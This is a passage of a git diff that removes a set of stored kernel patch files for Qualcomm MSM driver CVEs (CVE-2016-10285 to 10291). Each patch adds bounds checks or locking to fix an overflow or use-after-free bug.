-From d60a5839ba987e2c9d365fef950cae0c9ad11010 Mon Sep 17 00:00:00 2001
-From: SaidiReddy Yenuga
-Date: Tue, 21 Feb 2017 13:05:26 +0530
-Subject: qcacld-3.0: Trim operation classes to max supported in change station
-
-qcacld-2.0 to qcacld-3.0 Propagation.
-
-Operation classes supported can be controlled by user, which can
-be sent greater than the max supported operations. This results
-in stack overflow in change station command.
-
-Add check to validate operations supported param given by user
-and if it exceeds max supported value, set it to max supported
-value.
-
-CRs-Fixed: 2002052
-Change-Id: Idd3a35e38b091546a17d7ec6329f19429e5c289c
----
- core/hdd/src/wlan_hdd_cfg80211.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/core/hdd/src/wlan_hdd_cfg80211.c b/core/hdd/src/wlan_hdd_cfg80211.c
-index 2ac8896..8f13919 100644
---- a/core/hdd/src/wlan_hdd_cfg80211.c
-+++ b/core/hdd/src/wlan_hdd_cfg80211.c
-@@ -10513,6 +10513,14 @@ static int __wlan_hdd_change_station(struct wiphy *wiphy,
- hdd_notice("After removing duplcates StaParams.supported_channels_len: %d",
- StaParams.supported_channels_len);
- }
-+ if (params->supported_oper_classes_len >
-+ CDS_MAX_SUPP_OPER_CLASSES) {
-+ hdd_notice("received oper classes:%d, resetting it to max supported: %d",
-+ params->supported_oper_classes_len,
-+ CDS_MAX_SUPP_OPER_CLASSES);
-+ params->supported_oper_classes_len =
-+ CDS_MAX_SUPP_OPER_CLASSES;
-+ }
- qdf_mem_copy(StaParams.supported_oper_classes,
- params->supported_oper_classes,
- params->supported_oper_classes_len);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10285/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10285/ANY/0001.patch
deleted file mode 100644
index cc089c19..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10285/ANY/0001.patch
+++ /dev/null
@@ -1,143 +0,0 @@
-From 67dfd3a65336e0b3f55ee83d6312321dc5f2a6f9 Mon Sep 17 00:00:00 2001
-From: Padmanabhan Komanduru
-Date: Wed, 25 Jan 2017 16:38:48 +0530
-Subject: msm: mdss: handle synchronization issues during DSI debugfs
- read/write
-
-Handle race condition during read/write operations to DSI debugfs nodes
-related to DSI panel ON/OFF commands.
-
-Change-Id: I29c4ad74bf21d4cb5362565e902a682fe7263147
-Signed-off-by: Padmanabhan Komanduru
----
- drivers/video/msm/mdss/mdss_dsi.c | 21 +++++++++++++++++++--
- 1 file changed, 19 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_dsi.c b/drivers/video/msm/mdss/mdss_dsi.c
-index 885d132..e6d9edc 100644
---- a/drivers/video/msm/mdss/mdss_dsi.c
-+++ b/drivers/video/msm/mdss/mdss_dsi.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -625,6 +625,7 @@ struct buf_data {
- char *string_buf; /* cmd buf as string, 3 bytes per number */
- int sblen; /* string buffer length */
- int sync_flag;
-+ struct mutex dbg_mutex; /* mutex to synchronize read/write/flush */
- };
-
- struct mdss_dsi_debugfs_info {
-@@ -714,6 +715,7 @@ static ssize_t mdss_dsi_cmd_read(struct file *file, char __user *buf,
- char *bp;
- ssize_t ret = 0;
-
-+ mutex_lock(&pcmds->dbg_mutex);
- if (*ppos == 0) {
- kfree(pcmds->string_buf);
- pcmds->string_buf = NULL;
-@@ -732,6 +734,7 @@ static ssize_t mdss_dsi_cmd_read(struct file *file, char __user *buf,
- buffer = kmalloc(bsize, GFP_KERNEL);
- if (!buffer) {
- pr_err("%s: Failed to allocate memory\n", __func__);
-+ mutex_unlock(&pcmds->dbg_mutex);
- return -ENOMEM;
- }
-
-@@ -767,10 +770,12 @@ static ssize_t mdss_dsi_cmd_read(struct file *file, char __user *buf,
- kfree(pcmds->string_buf);
- pcmds->string_buf = NULL;
- pcmds->sblen = 0;
-+ mutex_unlock(&pcmds->dbg_mutex);
- return 0; /* the end */
- }
- ret = simple_read_from_buffer(buf, count, ppos, pcmds->string_buf,
- pcmds->sblen);
-+ mutex_unlock(&pcmds->dbg_mutex);
- return ret;
- }
-
-@@ -782,6 +787,7 @@ static ssize_t mdss_dsi_cmd_write(struct file *file, const char __user *p,
- int blen = 0;
- char *string_buf;
-
-+ mutex_lock(&pcmds->dbg_mutex);
- if (*ppos == 0) {
- kfree(pcmds->string_buf);
- pcmds->string_buf = NULL;
-@@ -793,6 +799,7 @@ static ssize_t mdss_dsi_cmd_write(struct file *file, const char __user *p,
- string_buf = krealloc(pcmds->string_buf, blen + 1, GFP_KERNEL);
- if (!string_buf) {
- pr_err("%s: Failed to allocate memory\n", __func__);
-+ mutex_unlock(&pcmds->dbg_mutex);
- return -ENOMEM;
- }
-
-@@ -802,6 +809,7 @@ static ssize_t mdss_dsi_cmd_write(struct file *file, const char __user *p,
- string_buf[blen] = '\0';
- pcmds->string_buf = string_buf;
- pcmds->sblen = blen;
-+ mutex_unlock(&pcmds->dbg_mutex);
- return ret;
- }
-
-@@ -812,8 +820,12 @@ static int mdss_dsi_cmd_flush(struct file *file, fl_owner_t id)
- char *buf, *bufp, *bp;
- struct dsi_ctrl_hdr *dchdr;
-
-- if (!pcmds->string_buf)
-+ mutex_lock(&pcmds->dbg_mutex);
-+
-+ if (!pcmds->string_buf) {
-+ mutex_unlock(&pcmds->dbg_mutex);
- return 0;
-+ }
-
- /*
- * Allocate memory for command buffer
-@@ -826,6 +838,7 @@ static int mdss_dsi_cmd_flush(struct file *file, fl_owner_t id)
- kfree(pcmds->string_buf);
- pcmds->string_buf = NULL;
- pcmds->sblen = 0;
-+ mutex_unlock(&pcmds->dbg_mutex);
- return -ENOMEM;
- }
-
-@@ -850,6 +863,7 @@ static int mdss_dsi_cmd_flush(struct file *file, fl_owner_t id)
- pr_err("%s: dtsi cmd=%x error, len=%d\n",
- __func__, dchdr->dtype, dchdr->dlen);
- kfree(buf);
-+ mutex_unlock(&pcmds->dbg_mutex);
- return -EINVAL;
- }
- bp += sizeof(*dchdr);
-@@ -861,6 +875,7 @@ static int mdss_dsi_cmd_flush(struct file *file, fl_owner_t id)
- pr_err("%s: dcs_cmd=%x len=%d error!\n", __func__,
- bp[0], len);
- kfree(buf);
-+ mutex_unlock(&pcmds->dbg_mutex);
- return -EINVAL;
- }
-
-@@ -873,6 +888,7 @@ static int mdss_dsi_cmd_flush(struct file *file, fl_owner_t id)
- pcmds->buf = buf;
- pcmds->blen = blen;
- }
-+ mutex_unlock(&pcmds->dbg_mutex);
- return 0;
- }
-
-@@ -887,6 +903,7 @@ struct dentry *dsi_debugfs_create_dcs_cmd(const char *name, umode_t mode,
- struct dentry *parent, struct buf_data *cmd,
- struct dsi_panel_cmds ctrl_cmds)
- {
-+ mutex_init(&cmd->dbg_mutex);
- cmd->buf = ctrl_cmds.buf;
- cmd->blen = ctrl_cmds.blen;
- cmd->string_buf = NULL;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10286/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10286/ANY/0001.patch
deleted file mode 100644
index 678c2dec..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10286/ANY/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@ -From 5d30a3d0dc04916ddfb972bfc52f8e636642f999 Mon Sep 17 00:00:00 2001 -From: Veera Sundaram Sankaran -Date: Fri, 11 Nov 2016 12:01:34 -0800 -Subject: msm: mdss: avoid removing wrong multirect on validate failures - -During atomic commit - validate failures, the newly allocated -pipes and pipes taken from the destroy list are cleaned up. -Currently pipe ndx is checked which can lead to cleaning up -the already in use multirect instead of the rect allocated -in the current validate. Add checks to include checking based -on multirect to avoid such cases. - -Change-Id: I7f8fb6630314cdc523490e28d90dd3776bdfeada -Signed-off-by: Veera Sundaram Sankaran ---- - drivers/video/fbdev/msm/mdss_mdp_layer.c | 12 ++++++++---- - 1 file changed, 8 insertions(+), 4 deletions(-) - -diff --git a/drivers/video/fbdev/msm/mdss_mdp_layer.c b/drivers/video/fbdev/msm/mdss_mdp_layer.c -index 20fcc26..036e4e3 100644 ---- a/drivers/video/fbdev/msm/mdss_mdp_layer.c -+++ b/drivers/video/fbdev/msm/mdss_mdp_layer.c -@@ -2470,16 +2470,20 @@ validate_exit: - mutex_lock(&mdp5_data->list_lock); - list_for_each_entry_safe(pipe, tmp, &mdp5_data->pipes_used, list) { - if (IS_ERR_VALUE(ret)) { -- if ((pipe->ndx & rec_release_ndx[0]) || -- (pipe->ndx & rec_release_ndx[1])) { -+ if (((pipe->ndx & rec_release_ndx[0]) && -+ (pipe->multirect.num == 0)) || -+ ((pipe->ndx & rec_release_ndx[1]) && -+ (pipe->multirect.num == 1))) { - mdss_mdp_smp_unreserve(pipe); - pipe->params_changed = 0; - pipe->dirty = true; - if (!list_empty(&pipe->list)) - list_del_init(&pipe->list); - mdss_mdp_pipe_destroy(pipe); -- } else if ((pipe->ndx & rec_destroy_ndx[0]) || -- (pipe->ndx & rec_destroy_ndx[1])) { -+ } else if (((pipe->ndx & rec_destroy_ndx[0]) && -+ (pipe->multirect.num == 0)) || -+ ((pipe->ndx & rec_destroy_ndx[1]) && -+ (pipe->multirect.num == 1))) { - /* - * cleanup/destroy list pipes should move back - * to destroy list. Next/current kickoff cycle --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2016-10287/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10287/ANY/0001.patch
deleted file mode 100644
index 5b96ada4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10287/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@ -From 937bc9e644180e258c68662095861803f7ba4ded Mon Sep 17 00:00:00 2001 -From: Siena Richard -Date: Mon, 23 Jan 2017 13:15:58 -0800 -Subject: ASoC: msm: qdsp6v2: completely deallocate on cal block creation - failure - -Completely deallocate the cal block if creation fails to ensure no -memory leaks are present. - -CRs-Fixed: 1112751 -Change-Id: I76916c8b3f7e8e9b864dc39dab96f7d330774473 -Signed-off-by: Siena Richard ---- - sound/soc/msm/qdsp6v2/audio_cal_utils.c | 4 +++- - 1 file changed, 3 insertions(+), 1 deletion(-) - -diff --git a/sound/soc/msm/qdsp6v2/audio_cal_utils.c b/sound/soc/msm/qdsp6v2/audio_cal_utils.c -index 75af648..b54cde4 100644 ---- a/sound/soc/msm/qdsp6v2/audio_cal_utils.c -+++ b/sound/soc/msm/qdsp6v2/audio_cal_utils.c -@@ -607,7 +607,6 @@ static struct cal_block_data *create_cal_block(struct cal_type_data *cal_type, - } - - INIT_LIST_HEAD(&cal_block->list); -- list_add_tail(&cal_block->list, &cal_type->cal_blocks); - - cal_block->map_data.ion_map_handle = basic_cal->cal_data.mem_handle; - if (basic_cal->cal_data.mem_handle > 0) { -@@ -639,6 +638,7 @@ static struct cal_block_data *create_cal_block(struct cal_type_data *cal_type, - goto err; - } - cal_block->buffer_number = basic_cal->cal_hdr.buffer_number; -+ list_add_tail(&cal_block->list, &cal_type->cal_blocks); - pr_debug("%s: created block for cal type %d, buf num %d, map handle %d, map size %zd paddr 0x%pK!\n", - __func__, cal_type->info.reg.cal_type, - cal_block->buffer_number, -@@ -648,6 +648,8 @@ static struct cal_block_data *create_cal_block(struct cal_type_data *cal_type, - done: - return cal_block; - err: -+ kfree(cal_block->cal_info); -+ kfree(cal_block->client_info); - kfree(cal_block); - cal_block = NULL; - return cal_block; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-10288/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10288/ANY/0001.patch deleted file mode 100644 index a4294fff..00000000 
--- a/Patches/Linux_CVEs/CVE-2016-10288/ANY/0001.patch
+++ /dev/null
@@ -1,206 +0,0 @@ -From db2cdc95204bc404f03613d5dd7002251fb33660 Mon Sep 17 00:00:00 2001 -From: Ankit Sharma -Date: Thu, 9 Feb 2017 16:23:09 +0530 -Subject: leds: qpnp-flash: Fix Use-after-free(UAF) for debugfs - -Fix UAF where two threads can open and close the same file. Second -open will cause the private data for the first file to be overwritten. -When the first file is closed and the private data is freed, this makes -the now-shared private data OOB for the second thread. - -CRs-Fixed: 1109763 -Change-Id: I1c4618d5be99e140abf0f3ea0d7f485897db5ab2 -Signed-off-by: Ankit Sharma ---- - drivers/leds/leds-qpnp-flash.c | 82 +++++++++++++++++++++++++++--------------- - 1 file changed, 54 insertions(+), 28 deletions(-) - -diff --git a/drivers/leds/leds-qpnp-flash.c b/drivers/leds/leds-qpnp-flash.c -index 56ba8f5..ec4b4e7 100644 ---- a/drivers/leds/leds-qpnp-flash.c -+++ b/drivers/leds/leds-qpnp-flash.c -@@ -225,11 +225,13 @@ struct flash_led_platform_data { - }; - - struct qpnp_flash_led_buffer { -- struct mutex debugfs_lock; /* Prevent thread concurrency */ -- size_t rpos; -- size_t wpos; -- size_t len; -- char data[0]; -+ struct mutex debugfs_lock; /* Prevent thread concurrency */ -+ size_t rpos; -+ size_t wpos; -+ size_t len; -+ struct qpnp_flash_led *led; -+ u32 buffer_cnt; -+ char data[0]; - }; - - /* -@@ -247,10 +249,8 @@ struct qpnp_flash_led { - struct workqueue_struct *ordered_workq; - struct qpnp_vadc_chip *vadc_dev; - struct mutex flash_led_lock; -- struct qpnp_flash_led_buffer *log; - struct dentry *dbgfs_root; - int num_leds; -- u32 buffer_cnt; - u16 base; - u16 current_addr; - u16 current2_addr; -@@ -282,10 +282,10 @@ static int flash_led_dbgfs_file_open(struct qpnp_flash_led *led, - log->wpos = 0; - log->len = logbufsize - sizeof(*log); - mutex_init(&log->debugfs_lock); -- led->log = log; -+ log->led = led; - -- led->buffer_cnt = 1; -- file->private_data = led; -+ log->buffer_cnt = 1; -+ file->private_data = log; - - return 0; - } -@@ -299,12 +299,12 @@ 
static int flash_led_dfs_open(struct inode *inode, struct file *file)
-
- static int flash_led_dfs_close(struct inode *inode, struct file *file)
- {
-- struct qpnp_flash_led *led = file->private_data;
-+ struct qpnp_flash_led_buffer *log = file->private_data;
-
-- if (led && led->log) {
-+ if (log) {
- file->private_data = NULL;
-- mutex_destroy(&led->log->debugfs_lock);
-- kfree(led->log);
-+ mutex_destroy(&log->debugfs_lock);
-+ kfree(log);
- }
-
- return 0;
-@@ -333,15 +333,21 @@ static int print_to_log(struct qpnp_flash_led_buffer *log,
-
- static ssize_t flash_led_dfs_latched_reg_read(struct file *fp, char __user *buf,
- size_t count, loff_t *ppos) {
-- struct qpnp_flash_led *led = fp->private_data;
-- struct qpnp_flash_led_buffer *log = led->log;
-+ struct qpnp_flash_led_buffer *log = fp->private_data;
-+ struct qpnp_flash_led *led;
- u8 val;
- int rc = 0;
- size_t len;
- size_t ret;
-
-+ if (!log) {
-+ pr_err("error: file private data is NULL\n");
-+ return -EFAULT;
-+ }
-+ led = log->led;
-+
- mutex_lock(&log->debugfs_lock);
-- if ((log->rpos >= log->wpos && led->buffer_cnt == 0) ||
-+ if ((log->rpos >= log->wpos && log->buffer_cnt == 0) ||
- ((log->len - log->wpos) < MIN_BUFFER_WRITE_LEN))
- goto unlock_mutex;
-
-@@ -353,7 +359,7 @@ static ssize_t flash_led_dfs_latched_reg_read(struct file *fp, char __user *buf,
- INT_LATCHED_STS(led->base), rc);
- goto unlock_mutex;
- }
-- led->buffer_cnt--;
-+ log->buffer_cnt--;
-
- rc = print_to_log(log, "0x%05X ", INT_LATCHED_STS(led->base));
- if (rc == 0)
-@@ -388,18 +394,24 @@ unlock_mutex:
-
- static ssize_t flash_led_dfs_fault_reg_read(struct file *fp, char __user *buf,
- size_t count, loff_t *ppos) {
-- struct qpnp_flash_led *led = fp->private_data;
-- struct qpnp_flash_led_buffer *log = led->log;
-+ struct qpnp_flash_led_buffer *log = fp->private_data;
-+ struct qpnp_flash_led *led;
- int rc = 0;
- size_t len;
- size_t ret;
-
-+ if (!log) {
-+ pr_err("error: file private data is NULL\n");
-+ return -EFAULT;
-+ }
-+ led = log->led;
-+
- mutex_lock(&log->debugfs_lock);
-- if ((log->rpos >= log->wpos && led->buffer_cnt == 0) ||
-+ if ((log->rpos >= log->wpos && log->buffer_cnt == 0) ||
- ((log->len - log->wpos) < MIN_BUFFER_WRITE_LEN))
- goto unlock_mutex;
-
-- led->buffer_cnt--;
-+ log->buffer_cnt--;
-
- rc = print_to_log(log, "0x%05X ", FLASH_LED_FAULT_STATUS(led->base));
- if (rc == 0)
-@@ -441,10 +453,17 @@ static ssize_t flash_led_dfs_fault_reg_enable(struct file *file,
- int data;
- size_t ret = 0;
-
-- struct qpnp_flash_led *led = file->private_data;
-+ struct qpnp_flash_led_buffer *log = file->private_data;
-+ struct qpnp_flash_led *led;
- char *kbuf;
-
-- mutex_lock(&led->log->debugfs_lock);
-+ if (!log) {
-+ pr_err("error: file private data is NULL\n");
-+ return -EFAULT;
-+ }
-+ led = log->led;
-+
-+ mutex_lock(&log->debugfs_lock);
- kbuf = kmalloc(count + 1, GFP_KERNEL);
- if (!kbuf) {
- ret = -ENOMEM;
-@@ -479,7 +498,7 @@ static ssize_t flash_led_dfs_fault_reg_enable(struct file *file,
- free_buf:
- kfree(kbuf);
- unlock_mutex:
-- mutex_unlock(&led->log->debugfs_lock);
-+ mutex_unlock(&log->debugfs_lock);
- return ret;
- }
-
-@@ -491,10 +510,17 @@ static ssize_t flash_led_dfs_dbg_enable(struct file *file,
- int cnt = 0;
- int data;
- size_t ret = 0;
-- struct qpnp_flash_led *led = file->private_data;
-+ struct qpnp_flash_led_buffer *log = file->private_data;
-+ struct qpnp_flash_led *led;
- char *kbuf;
-
-- mutex_lock(&led->log->debugfs_lock);
-+ if (!log) {
-+ pr_err("error: file private data is NULL\n");
-+ return -EFAULT;
-+ }
-+ led = log->led;
-+
-+ mutex_lock(&log->debugfs_lock);
- kbuf = kmalloc(count + 1, GFP_KERNEL);
- if (!kbuf) {
- ret = -ENOMEM;
-@@ -528,7 +554,7 @@ static ssize_t flash_led_dfs_dbg_enable(struct file *file,
- free_buf:
- kfree(kbuf);
- unlock_mutex:
-- mutex_unlock(&led->log->debugfs_lock);
-+ mutex_unlock(&log->debugfs_lock);
- return ret;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10289/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2016-10289/3.18/0001.patch
deleted file mode 100644
index b8aa3cce..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10289/3.18/0001.patch
+++ /dev/null
@@ -1,80 +0,0 @@ -From a604e6f3889ccc343857532b63dea27603381816 Mon Sep 17 00:00:00 2001 -From: Zhen Kong -Date: Tue, 31 Jan 2017 12:07:10 -0800 -Subject: crypto: msm: check length before copying to buf in _debug_stats_read - -Make sure that `len` is not larger than `count` before copying data -to userspace `buf` in _debug_stats_read(). - -Change-Id: Iafb7cfa3828653f8c28183c812797c3d9a183da1 -Signed-off-by: Zhen Kong ---- - drivers/crypto/msm/ota_crypto.c | 6 +++--- - drivers/crypto/msm/qcedev.c | 4 ++-- - drivers/crypto/msm/qcrypto.c | 6 +++--- - 3 files changed, 8 insertions(+), 8 deletions(-) - -diff --git a/drivers/crypto/msm/ota_crypto.c b/drivers/crypto/msm/ota_crypto.c -index 8aa0d04..416623f 100644 ---- a/drivers/crypto/msm/ota_crypto.c -+++ b/drivers/crypto/msm/ota_crypto.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2010-2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -884,8 +884,8 @@ static ssize_t _debug_stats_read(struct file *file, char __user *buf, - int len; - - len = _disp_stats(); -- -- rc = simple_read_from_buffer((void __user *) buf, len, -+ if (len <= count) -+ rc = simple_read_from_buffer((void __user *) buf, len, - ppos, (void *) _debug_read_buf, len); - - return rc; -diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c -index a629c62..5ce87a6e 100644 ---- a/drivers/crypto/msm/qcedev.c -+++ b/drivers/crypto/msm/qcedev.c -@@ -1987,9 +1987,9 @@ static ssize_t _debug_stats_read(struct file *file, char __user *buf, - - len = _disp_stats(qcedev); - -- rc = simple_read_from_buffer((void __user *) buf, len, -+ if (len <= count) -+ rc = simple_read_from_buffer((void __user *) buf, len, - ppos, (void *) _debug_read_buf, len); -- - return rc; - } - -diff --git a/drivers/crypto/msm/qcrypto.c b/drivers/crypto/msm/qcrypto.c 
-index 3324c9d..dd4443f 100644
---- a/drivers/crypto/msm/qcrypto.c
-+++ b/drivers/crypto/msm/qcrypto.c
-@@ -1,6 +1,6 @@
- /* Qualcomm Crypto driver
- *
-- * Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2010-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -5742,9 +5742,9 @@ static ssize_t _debug_stats_read(struct file *file, char __user *buf,
-
- len = _disp_stats(qcrypto);
-
-- rc = simple_read_from_buffer((void __user *) buf, len,
-+ if (len <= count)
-+ rc = simple_read_from_buffer((void __user *) buf, len,
- ppos, (void *) _debug_read_buf, len);
--
- return rc;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10289/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2016-10289/4.4/0002.patch
deleted file mode 100644
index bf53d873..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10289/4.4/0002.patch
+++ /dev/null
@@ -1,80 +0,0 @@ -From 08a969c0e4c399df047c8055ac11a19e124500ed Mon Sep 17 00:00:00 2001 -From: Zhen Kong -Date: Tue, 31 Jan 2017 12:07:10 -0800 -Subject: crypto: msm: check length before copying to buf in _debug_stats_read - -Make sure that `len` is not larger than `count` before copying data -to userspace `buf` in _debug_stats_read(). - -Change-Id: Iafb7cfa3828653f8c28183c812797c3d9a183da1 -Signed-off-by: Zhen Kong ---- - drivers/crypto/msm/ota_crypto.c | 6 +++--- - drivers/crypto/msm/qcedev.c | 4 ++-- - drivers/crypto/msm/qcrypto.c | 6 +++--- - 3 files changed, 8 insertions(+), 8 deletions(-) - -diff --git a/drivers/crypto/msm/ota_crypto.c b/drivers/crypto/msm/ota_crypto.c -index 9b4a001..674913c 100644 ---- a/drivers/crypto/msm/ota_crypto.c -+++ b/drivers/crypto/msm/ota_crypto.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2010-2014, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2010-2014,2017 The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -880,8 +880,8 @@ static ssize_t _debug_stats_read(struct file *file, char __user *buf, - int len; - - len = _disp_stats(); -- -- rc = simple_read_from_buffer((void __user *) buf, len, -+ if (len <= count) -+ rc = simple_read_from_buffer((void __user *) buf, len, - ppos, (void *) _debug_read_buf, len); - - return rc; -diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c -index a629c62..5ce87a6e 100644 ---- a/drivers/crypto/msm/qcedev.c -+++ b/drivers/crypto/msm/qcedev.c -@@ -1987,9 +1987,9 @@ static ssize_t _debug_stats_read(struct file *file, char __user *buf, - - len = _disp_stats(qcedev); - -- rc = simple_read_from_buffer((void __user *) buf, len, -+ if (len <= count) -+ rc = simple_read_from_buffer((void __user *) buf, len, - ppos, (void *) _debug_read_buf, len); -- - return rc; - } - -diff --git a/drivers/crypto/msm/qcrypto.c 
b/drivers/crypto/msm/qcrypto.c
-index a898dbc..893b0b6 100644
---- a/drivers/crypto/msm/qcrypto.c
-+++ b/drivers/crypto/msm/qcrypto.c
-@@ -1,6 +1,6 @@
- /* Qualcomm Crypto driver
- *
-- * Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2010-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -5419,9 +5419,9 @@ static ssize_t _debug_stats_read(struct file *file, char __user *buf,
-
- len = _disp_stats(qcrypto);
-
-- rc = simple_read_from_buffer((void __user *) buf, len,
-+ if (len <= count)
-+ rc = simple_read_from_buffer((void __user *) buf, len,
- ppos, (void *) _debug_read_buf, len);
--
- return rc;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10290/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10290/ANY/0001.patch
deleted file mode 100644
index ac233c61..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10290/ANY/0001.patch
+++ /dev/null
@@ -1,88 +0,0 @@ -From a5e46d8635a2e28463b365aacdeab6750abd0d49 Mon Sep 17 00:00:00 2001 -From: Sahitya Tummala -Date: Fri, 3 Feb 2017 13:24:19 +0530 -Subject: uio: fix potential use after free issue when accessing debug_buffer - -The variable debug_buffer is a global variable which is allocated -and free'd when open/close is called on debugfs file - -"/sys/kernel/debug/rmt_storage/info". The current code doesn't -have locks to handle concurrent accesses to the above file. -This results into use after free issue when debug_buffer is -accessed by two threads at the same time. Fix this by adding -a mutex lock to protect this global variable. - -Change-Id: I6bc3f0ae2d7fca3ca9fe8561612f5863b6c3268a -Signed-off-by: Sahitya Tummala ---- - drivers/uio/msm_sharedmem/sharedmem_qmi.c | 17 ++++++++++++++--- - 1 file changed, 14 insertions(+), 3 deletions(-) - -diff --git a/drivers/uio/msm_sharedmem/sharedmem_qmi.c b/drivers/uio/msm_sharedmem/sharedmem_qmi.c -index 48fb17e..fd95dee 100644 ---- a/drivers/uio/msm_sharedmem/sharedmem_qmi.c -+++ b/drivers/uio/msm_sharedmem/sharedmem_qmi.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2014-2015, 2017, The Linux Foundation. All rights reserved. 
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -223,6 +223,7 @@ static int sharedmem_qmi_req_cb(struct qmi_handle *handle, void *conn_h,
- #define DEBUG_BUF_SIZE (2048)
- static char *debug_buffer;
- static u32 debug_data_size;
-+static struct mutex dbg_buf_lock; /* mutex for debug_buffer */
-
- static ssize_t debug_read(struct file *file, char __user *buf,
- size_t count, loff_t *file_pos)
-@@ -279,21 +280,29 @@ static int debug_open(struct inode *inode, struct file *file)
- {
- u32 buffer_size;
-
-- if (debug_buffer != NULL)
-+ mutex_lock(&dbg_buf_lock);
-+ if (debug_buffer != NULL) {
-+ mutex_unlock(&dbg_buf_lock);
- return -EBUSY;
-+ }
- buffer_size = DEBUG_BUF_SIZE;
- debug_buffer = kzalloc(buffer_size, GFP_KERNEL);
-- if (debug_buffer == NULL)
-+ if (debug_buffer == NULL) {
-+ mutex_unlock(&dbg_buf_lock);
- return -ENOMEM;
-+ }
- debug_data_size = fill_debug_info(debug_buffer, buffer_size);
-+ mutex_unlock(&dbg_buf_lock);
- return 0;
- }
-
- static int debug_close(struct inode *inode, struct file *file)
- {
-+ mutex_lock(&dbg_buf_lock);
- kfree(debug_buffer);
- debug_buffer = NULL;
- debug_data_size = 0;
-+ mutex_unlock(&dbg_buf_lock);
- return 0;
- }
-
-@@ -324,6 +333,7 @@ static void debugfs_init(void)
- {
- struct dentry *f_ent;
-
-+ mutex_init(&dbg_buf_lock);
- dir_ent = debugfs_create_dir("rmt_storage", NULL);
- if (IS_ERR(dir_ent)) {
- pr_err("Failed to create debug_fs directory\n");
-@@ -352,6 +362,7 @@ static void debugfs_init(void)
- static void debugfs_exit(void)
- {
- debugfs_remove_recursive(dir_ent);
-+ mutex_destroy(&dbg_buf_lock);
- }
-
- static void sharedmem_qmi_svc_recv_msg(struct work_struct *work)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10291/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-10291/3.10/0001.patch
deleted file mode 100644
index 6e74db35..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10291/3.10/0001.patch
+++ /dev/null
@@ -1,74 +0,0 @@ -From c2b026dcd498c93a789b6b84dbe9a73c4a9d8135 Mon Sep 17 00:00:00 2001 -From: Dilip Kota -Date: Mon, 21 Mar 2016 11:28:51 +0530 -Subject: slim-msm: Synchronize SSR callbacks - -Subsystem will restart within short timeframe. -Synchronise subsytem up/down callback notifications -to avoid functionality failures. -Use mutex locks to achieve synchronization. - -Change-Id: I5881c7d468507bb8402a2e9f8178b9c31e57e8a5 -Signed-off-by: Dilip Kota ---- - drivers/slimbus/slim-msm-ngd.c | 5 +++++ - drivers/slimbus/slim-msm.h | 3 ++- - 2 files changed, 7 insertions(+), 1 deletion(-) - -diff --git a/drivers/slimbus/slim-msm-ngd.c b/drivers/slimbus/slim-msm-ngd.c -index 5c2c9a6..8c3a184 100644 ---- a/drivers/slimbus/slim-msm-ngd.c -+++ b/drivers/slimbus/slim-msm-ngd.c -@@ -1446,11 +1446,13 @@ static void ngd_adsp_down(struct msm_slim_ctrl *dev) - struct slim_controller *ctrl = &dev->ctrl; - struct slim_device *sbdev; - -+ mutex_lock(&dev->ssr_lock); - ngd_slim_enable(dev, false); - /* device up should be called again after SSR */ - list_for_each_entry(sbdev, &ctrl->devs, dev_list) - slim_report_absent(sbdev); - SLIM_INFO(dev, "SLIM ADSP SSR (DOWN) done\n"); -+ mutex_unlock(&dev->ssr_lock); - } - - static void ngd_adsp_up(struct work_struct 